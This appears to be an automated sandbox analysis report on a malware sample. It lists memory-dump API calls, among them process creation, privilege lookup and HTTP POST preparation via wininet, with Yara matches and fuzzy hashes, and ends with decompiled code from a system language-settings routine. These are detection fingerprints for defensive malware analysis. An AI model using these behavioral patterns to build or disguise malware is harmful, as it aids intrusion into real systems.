                                                              • API String ID: 3535843008-2828778071
                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction ID: 78b2371570d793dcaf4ae20e4098aae7a77940f79cae71c1ec23baa99d6a3e0d
                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                              • Instruction Fuzzy Hash: A2D012752003146BD710EBD8CC45ED7775CEF45750F154495BA185B242C530F50086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000DA579
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 73c67fecdb17961c11ed84289770de546856e7ddf6712c32a9059fd093956411
                                                              • Instruction ID: aff31bfb32b683c84bc248eed6492b27a835fc01f4721b7fe056350759fee4ff
                                                              • Opcode Fuzzy Hash: 73c67fecdb17961c11ed84289770de546856e7ddf6712c32a9059fd093956411
                                                              • Instruction Fuzzy Hash: 1CF015B6210208AFDB18DF89CC81EEB77ADEF88754F158159FE1897242C631E911CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000C2D11,00002000,00003000,00000004), ref: 000DA579
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction ID: 08c289582268a2eed93c454545761e589863713c2ad6a1f8d0d8c570d090b4bc
                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                              • Instruction Fuzzy Hash: ADF015B2200208ABCB14DF89CC81EEB77ADEF88754F158159BE0897241C630F810CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 000D9128
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: POST$net.dll$wininet.dll
                                                              • API String ID: 3472027048-3140911592
                                                              • Opcode ID: 21503c2815ffec126fad4fa22fe696a6e5cf4123ad9a1f4ad1931ad061aa9901
                                                              • Instruction ID: 5bc012dca19314cd43af20c2bdc7f3c6f60dfaade626dbbdae33bbca710f8ae5
                                                              • Opcode Fuzzy Hash: 21503c2815ffec126fad4fa22fe696a6e5cf4123ad9a1f4ad1931ad061aa9901
                                                              • Instruction Fuzzy Hash: A631F076600305BBD714EF64C885BABB7B8EB48704F10811AFA2D5B342D770A910CBB5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 000D9128
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: a77418eb90fed03aa7c14b10b3b0bd65db0ada577fe5392f405e5ce4b993d58d
                                                              • Instruction ID: cc8e5cc3e778219830e10a4cb02142128005a96681e1272de73a57475b6eefeb
                                                              • Opcode Fuzzy Hash: a77418eb90fed03aa7c14b10b3b0bd65db0ada577fe5392f405e5ce4b993d58d
                                                              • Instruction Fuzzy Hash: F93161B6500745BBC724DF64C889FABB7F9BB48B00F10851EF62A5B245D630B550CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(6E,?,000D4CAF,000D4CAF,?,000D4536,?,?,?,?,?,00000000,00000000,?), ref: 000DA65D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: 6E
                                                              • API String ID: 1279760036-739805133
                                                              • Opcode ID: 7194f638ea6bd9414c0e0694083c68c6932af03ab105997f5b8ef94423553d32
                                                              • Instruction ID: b7a80629289d8bac7e0ab539911324c5d8e3cc2ffc851d1c67c2dee9250859b8
                                                              • Opcode Fuzzy Hash: 7194f638ea6bd9414c0e0694083c68c6932af03ab105997f5b8ef94423553d32
                                                              • Instruction Fuzzy Hash: 7311AFB1200204AFDB14DF98DC85EEB77A8EF85760F188599F95C9B242C531E910CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA734
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID: .P
                                                              • API String ID: 2186235152-3002838398
                                                              • Opcode ID: c81224339e75ab53635f4ff4be2a4b8e319ad2baa13f8d9a8a23c9844943465f
                                                              • Instruction ID: a4def35fcb088ff9eedce9a870ba19f09f2991c6f8193e1ffc9b7d53853b3859
                                                              • Opcode Fuzzy Hash: c81224339e75ab53635f4ff4be2a4b8e319ad2baa13f8d9a8a23c9844943465f
                                                              • Instruction Fuzzy Hash: 72118EB52042486FDB14DF98DC81DE777ACEF89714F14829AF94C8B246C534E815CBB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(6E,?,000D4CAF,000D4CAF,?,000D4536,?,?,?,?,?,00000000,00000000,?), ref: 000DA65D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: 6E
                                                              • API String ID: 1279760036-739805133
                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                              • Instruction ID: d27633df122d7444cd45e69388904aacdcaa4e9d85a840e095ffae3908121d9b
                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                              • Instruction Fuzzy Hash: 26E012B1200208ABDB14EF99CC41EA777ACEF88654F158599BA085B242C630F9108AB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3AF8), ref: 000DA69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                              • Instruction ID: 833fd6bac7bb3bc6fc8ba597ab9392afa5a9cc8ef4b2abd463215f905d665dc8
                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                              • Instruction Fuzzy Hash: 3BE012B1200208ABDB18EF99CC49EA777ACEF88750F118599BA085B242C630E9108AB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C836A
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C838B
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 5f402ef30ff872db9391dafd90e07617a7bfdda7e2d4461ac7fadc8f762b377b
                                                              • Instruction ID: 6e9f33d53c74b92d3944fa946699dd0c0dec5c700d3084c94fb570068a0b4432
                                                              • Opcode Fuzzy Hash: 5f402ef30ff872db9391dafd90e07617a7bfdda7e2d4461ac7fadc8f762b377b
                                                              • Instruction Fuzzy Hash: EA01D631A4022877E725A7949C42FFE77686B41B95F04414DFF04BB2C2E6A4690647F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C836A
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C838B
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                              • Instruction ID: 0cf38f52aac7cb1b50b042b91411d8ec99d7be691cc7da678c93a7e49adf1d6d
                                                              • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                              • Instruction Fuzzy Hash: 5F018F31A8032C7BE721A6949C43FFE776C6B41F55F054119FF04BA2C2EAA46A0647F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000CAD62
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                              • Instruction ID: 835aae2cdd972bd841f2f745de3f979b3e6f12249c33657fe5215b0e69298a89
                                                              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                              • Instruction Fuzzy Hash: 84011EB5E4020DBBDF10DBA4DC42FDDB7B89B54308F00459AEA0997642F631EB14CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,000C8D14,?), ref: 000CF6FB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 4122df8dead49c64f1156d70ec1abdf76d6893d67eeb1b1fee6585eae0c3ad26
                                                              • Instruction ID: 8939d49f9e8f792931d76e75e04eaae435b6e5168e75acc53c1c5d500b456ce0
                                                              • Opcode Fuzzy Hash: 4122df8dead49c64f1156d70ec1abdf76d6893d67eeb1b1fee6585eae0c3ad26
                                                              • Instruction Fuzzy Hash: 1701AC7194020D7AEB20EBA4DC86FFE73A9EF54B10F054599F90CA7283D7B0998187A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA734
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                              • Instruction ID: 4c29f43dadfff1bab8b637be6b824bc3a637cbab9eae0dca9c008fa58d9db889
                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                              • Instruction Fuzzy Hash: 9101AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA734
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 65430b4bcd81f8e4a1f34887c09f54abf117a2fedab366dd768bbf62a6493fde
                                                              • Instruction ID: 316aa8f4d3aa580bb2193673294da48da13bb43ffc185f85d09decb27f156055
                                                              • Opcode Fuzzy Hash: 65430b4bcd81f8e4a1f34887c09f54abf117a2fedab366dd768bbf62a6493fde
                                                              • Instruction Fuzzy Hash: E4015BB2210108AFCB58DF99DC80EEB77A9AF8C754F158258BA0DE7255D630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CF050,?,?,00000000), ref: 000D91EC
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
                                                              • Instruction ID: e86311bccc33afaaf0d6913dbe43ef6e4dc7957d2c28d90f2584a79dacc2473a
                                                              • Opcode Fuzzy Hash: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
                                                              • Instruction Fuzzy Hash: 8DE092373903043AE3306599AC03FE7B39CDB81B20F140026FA0DEB2C2D995F80142B4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CF1D2,000CF1D2,?,00000000,?,?), ref: 000DA800
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 19fea9491f50e488765742f420a6f4cf67f724ee41bc20e91e9c64c2348761ea
                                                              • Instruction ID: 1711603454b9a93f6dde03e4f0b787df3c31ced6ee6930a2b495de40cfacb7b6
                                                              • Opcode Fuzzy Hash: 19fea9491f50e488765742f420a6f4cf67f724ee41bc20e91e9c64c2348761ea
                                                              • Instruction Fuzzy Hash: 4CF058B63102086BDB10EF99DC81EEB73A9EF89720F10855AFE0C97241C635E9008BB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CF1D2,000CF1D2,?,00000000,?,?), ref: 000DA800
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction ID: d65f15b27cf3e37c2656930f4eeb94e8ab50f37be8f5b5a6d575ba66f6579d45
                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction Fuzzy Hash: 49E01AB12002086BDB10DF89CC85EE737ADEF89650F118165BA0857242C930E8108BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,000C8D14,?), ref: 000CF6FB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                              • Instruction ID: 482f86f86401dfeb975a57f8f1f614de5735923d4d6a7f8b2160aab3d263f72f
                                                              • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                              • Instruction Fuzzy Hash: 4ED05E616503093BE610AAA49C03F6632C96B44B04F490064F948963C3D960E4004165
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              C-Code - Quality: 94%
                                                              			E01EE8788(signed int __ecx, void* __edx, signed int _a4) {
                                                              				signed int _v8;
                                                              				short* _v12;
                                                              				void* _v16;
                                                              				signed int _v20;
                                                              				char _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				char _v36;
                                                              				signed int _v40;
                                                              				char _v44;
                                                              				signed int _v48;
                                                              				signed int _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				char _v68;
                                                              				void* _t216;
                                                              				intOrPtr _t231;
                                                              				short* _t235;
                                                              				intOrPtr _t257;
                                                              				short* _t261;
                                                              				intOrPtr _t284;
                                                              				intOrPtr _t288;
                                                              				void* _t314;
                                                              				signed int _t318;
                                                              				short* _t319;
                                                              				intOrPtr _t321;
                                                              				void* _t328;
                                                              				void* _t329;
                                                              				char* _t332;
                                                              				signed int _t333;
                                                              				signed int* _t334;
                                                              				void* _t335;
                                                              				void* _t338;
                                                              				void* _t339;
                                                              
                                                              				_t328 = __edx;
                                                              				_t322 = __ecx;
                                                              				_t318 = 0;
                                                              				_t334 = _a4;
                                                              				_v8 = 0;
                                                              				_v28 = 0;
                                                              				_v48 = 0;
                                                              				_v20 = 0;
                                                              				_v40 = 0;
                                                              				_v32 = 0;
                                                              				_v52 = 0;
                                                              				if(_t334 == 0) {
                                                              					_t329 = 0xc000000d;
                                                              					L49:
                                                              					_t334[0x11] = _v56;
                                                              					 *_t334 =  *_t334 | 0x00000800;
                                                              					_t334[0x12] = _v60;
                                                              					_t334[0x13] = _v28;
                                                              					_t334[0x17] = _v20;
                                                              					_t334[0x16] = _v48;
                                                              					_t334[0x18] = _v40;
                                                              					_t334[0x14] = _v32;
                                                              					_t334[0x15] = _v52;
                                                              					return _t329;
                                                              				}
                                                              				_v56 = 0;
                                                              				if(E01EE8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                              					_v56 = 1;
                                                              					if(_v8 != 0) {
                                                              						_t207 = E01ECE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                              					}
                                                              					_push(1);
                                                              					_v8 = _t318;
                                                              					E01EE718A(_t207);
                                                              					_t335 = _t335 + 4;
                                                              				}
                                                              				_v60 = _v60 | 0xffffffff;
                                                              				if(E01EE8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                              					_t333 =  *_v8;
                                                              					_v60 = _t333;
                                                              					_t314 = E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              					_push(_t333);
                                                              					_v8 = _t318;
                                                              					E01EE718A(_t314);
                                                              					_t335 = _t335 + 4;
                                                              				}
                                                              				_t216 = E01EE8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                              				_t332 = ";";
                                                              				if(_t216 < 0) {
                                                              					L17:
                                                              					if(E01EE8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                              						L30:
                                                              						if(E01EE8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                              							L46:
                                                              							_t329 = 0;
                                                              							L47:
                                                              							if(_v8 != _t318) {
                                                              								E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              							}
                                                              							if(_v28 != _t318) {
                                                              								if(_v20 != _t318) {
                                                              									E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                              									_v20 = _t318;
                                                              									_v40 = _t318;
                                                              								}
                                                              							}
                                                              							goto L49;
                                                              						}
                                                              						_t231 = _v24;
                                                              						_t322 = _t231 + 4;
                                                              						_push(_t231);
                                                              						_v52 = _t322;
                                                              						E01EE718A(_t231);
                                                              						if(_t322 == _t318) {
                                                              							_v32 = _t318;
                                                              						} else {
                                                              							_v32 = E01ECE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              						}
                                                              						if(_v32 == _t318) {
                                                              							_v52 = _t318;
                                                              							L58:
                                                              							_t329 = 0xc0000017;
                                                              							goto L47;
                                                              						} else {
                                                              							E01EC2340(_v32, _v8, _v24);
                                                              							_v16 = _v32;
                                                              							_a4 = _t318;
                                                              							_t235 = E01EDE679(_v32, _t332);
                                                              							while(1) {
                                                              								_t319 = _t235;
                                                              								if(_t319 == 0) {
                                                              									break;
                                                              								}
                                                              								 *_t319 = 0;
                                                              								_t321 = _t319 + 2;
                                                              								E01ECE2A8(_t322,  &_v68, _v16);
                                                              								if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
                                                              									_a4 = _a4 + 1;
                                                              								}
                                                              								_v16 = _t321;
                                                              								_t235 = E01EDE679(_t321, _t332);
                                                              								_pop(_t322);
                                                              							}
                                                              							_t236 = _v16;
                                                              							if( *_v16 != _t319) {
                                                              								E01ECE2A8(_t322,  &_v68, _t236);
                                                              								if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
                                                              									_a4 = _a4 + 1;
                                                              								}
                                                              							}
                                                              							if(_a4 == 0) {
                                                              								E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                              								_v52 = _v52 & 0x00000000;
                                                              								_v32 = _v32 & 0x00000000;
                                                              							}
                                                              							if(_v8 != 0) {
                                                              								E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                              							}
                                                              							_v8 = _v8 & 0x00000000;
                                                              							_t318 = 0;
                                                              							goto L46;
                                                              						}
                                                              					}
                                                              					_t257 = _v24;
                                                              					_t322 = _t257 + 4;
                                                              					_push(_t257);
                                                              					_v40 = _t322;
                                                              					E01EE718A(_t257);
                                                              					_t338 = _t335 + 4;
                                                              					if(_t322 == _t318) {
                                                              						_v20 = _t318;
                                                              					} else {
                                                              						_v20 = E01ECE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              					}
                                                              					if(_v20 == _t318) {
                                                              						_v40 = _t318;
                                                              						goto L58;
                                                              					} else {
                                                              						E01EC2340(_v20, _v8, _v24);
                                                              						_v16 = _v20;
                                                              						_a4 = _t318;
                                                              						_t261 = E01EDE679(_v20, _t332);
                                                              						_t335 = _t338 + 0x14;
                                                              						while(1) {
                                                              							_v12 = _t261;
                                                              							if(_t261 == _t318) {
                                                              								break;
                                                              							}
                                                              							_v12 = _v12 + 2;
                                                              							 *_v12 = 0;
                                                              							E01ECE2A8(_v12,  &_v68, _v16);
                                                              							if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
                                                              								_a4 = _a4 + 1;
                                                              							}
                                                              							_v16 = _v12;
                                                              							_t261 = E01EDE679(_v12, _t332);
                                                              							_pop(_t322);
                                                              						}
                                                              						_t269 = _v16;
                                                              						if( *_v16 != _t318) {
                                                              							E01ECE2A8(_t322,  &_v68, _t269);
                                                              							if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
                                                              								_a4 = _a4 + 1;
                                                              							}
                                                              						}
                                                              						if(_a4 == _t318) {
